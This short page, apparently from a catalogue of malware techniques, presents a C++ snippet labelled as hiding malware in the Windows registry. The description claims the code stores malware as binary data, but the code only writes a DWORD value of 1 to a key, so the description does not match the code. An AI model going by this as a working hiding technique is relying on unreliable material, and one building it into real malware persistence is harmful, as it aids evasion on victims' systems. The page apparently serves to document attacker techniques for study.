(C++) Hiding Mechanisms by Thomas Roccia

Created the Tuesday 13 December 2022. Updated 1 month, 2 weeks ago.

Description:

The code uses the Windows API to open a registry key and create a new value within that key. The value is set to a binary data type, which could be used to store the malware itself. This code would need to be compiled and executed on a system to hide the malware in the registry.

Code

            #include <Windows.h>

int main()
{
  // Open the registry key where the malware will be hidden
  HKEY hKey;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MyMalware", 0, KEY_WRITE, &hKey);
  
  // Create a new value in the registry key to store the malware
  DWORD dwValue = 1;
  RegSetValueEx(hKey, "HiddenValue", 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(dwValue));
  
  // Close the registry key
  RegCloseKey(hKey);
  
  // Return success
  return 0;
}